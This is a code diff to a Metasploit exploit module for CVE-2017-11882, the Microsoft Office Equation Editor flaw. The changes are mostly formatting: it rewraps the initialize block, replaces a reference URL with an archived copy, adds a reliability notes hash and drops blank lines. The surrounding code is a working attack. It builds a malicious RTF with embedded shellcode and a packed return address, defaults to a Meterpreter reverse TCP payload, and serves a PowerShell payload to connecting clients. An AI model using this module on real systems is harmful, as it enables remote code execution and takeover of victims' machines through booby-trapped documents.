@@ -11,43 +11,50 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
   include Msf::Exploit::FILEFORMAT
 
-
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Microsoft Office CVE-2017-11882',
-      'Description' => %q{
-        Module exploits a flaw in how the Equation Editor that
-        allows an attacker to execute arbitrary code in RTF files without
-        interaction. The vulnerability is caused by the Equation Editor,
-        to which fails to properly handle OLE objects in memory.
-      },
-      'Author' => ['mumbai', 'embedi'],
-      'License' => MSF_LICENSE,
-      'DisclosureDate' => '2017-11-15',
-      'References' => [
-        ['CVE', '2017-11882'],
-        ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
-        ['URL', 'https://github.com/embedi/CVE-2017-11882']
-      ],
-      'Platform' => 'win',
-      'Arch' => [ARCH_X86, ARCH_X64],
-      'Targets' => [
-        ['Microsoft Office', {} ],
-      ],
-      'DefaultTarget' => 0,
-      'Payload' => {
-        'DisableNops' => true
-      },
-      'Stance' => Msf::Exploit::Stance::Aggressive,
-      'DefaultOptions' => {
-        'EXITFUNC' => 'thread',
-        'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
-      }
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft Office CVE-2017-11882',
+        'Description' => %q{
+          Module exploits a flaw in how the Equation Editor that
+          allows an attacker to execute arbitrary code in RTF files without
+          interaction. The vulnerability is caused by the Equation Editor,
+          to which fails to properly handle OLE objects in memory.
+        },
+        'Author' => ['mumbai', 'embedi'],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2017-11-15',
+        'References' => [
+          ['CVE', '2017-11882'],
+          ['URL', 'http://web.archive.org/web/20211201000500/https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],
+          ['URL', 'https://github.com/embedi/CVE-2017-11882']
+        ],
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [
+          ['Microsoft Office', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options([
-        OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
-        OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
+      OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
+      OptString.new("FOLDER_PATH", [false, "Path to file to inject", nil])
     ])
   end
 
@@ -78,8 +85,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return header
   end
 
-
-
   def generate_rtf
     header = retrieve_header(datastore['FILENAME'])
     object_class = '{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
@@ -156,7 +161,6 @@ class MetasploitModule < Msf::Exploit::Remote
     object_class << "00000300040000000000000000000000000000000000000000000000000000000"
     object_class << "000000000000000000000000000000000000000000000000000000000000000\n"
 
-
     shellcode = "\x1c\x00"                  #  0:   1c 00                   sbb    al,0x0
     shellcode << "\x00\x00"                 #  2:   00 00                   add    BYTE PTR [eax],al
     shellcode << "\x02\x00"                 #  4:   02 00                   add    al,BYTE PTR [eax]
@@ -236,7 +240,6 @@ class MetasploitModule < Msf::Exploit::Remote
     footer << "}}}\n"
     footer << '\par}' + "\n"
 
-
     payload = shellcode
     payload += [0x00402114].pack("V")
     payload += "\x00" * 2
@@ -246,8 +249,6 @@ class MetasploitModule < Msf::Exploit::Remote
     payload
   end
 
-
-
   def gen_psh(url, *method)
     ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
 
@@ -285,20 +286,17 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Delivering payload to #{cli.peerhost}...")
       p = regenerate_payload(cli)
       data = cmd_psh_payload(p.encoded,
-                       payload_instance.arch.first,
-                       remove_comspec: true,
-                       exec_in_place: true
-      )
+                             payload_instance.arch.first,
+                             remove_comspec: true,
+                             exec_in_place: true)
       send_response(cli, data, 'Content-Type' => 'application/octet-stream')
     end
   end
 
-
   def rand_class_id
     "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}"
   end
 
-
   def gen_sct_file(command)
     # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).
     if command == ''
@@ -309,7 +307,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   def primer
     file_create(generate_rtf)
   end
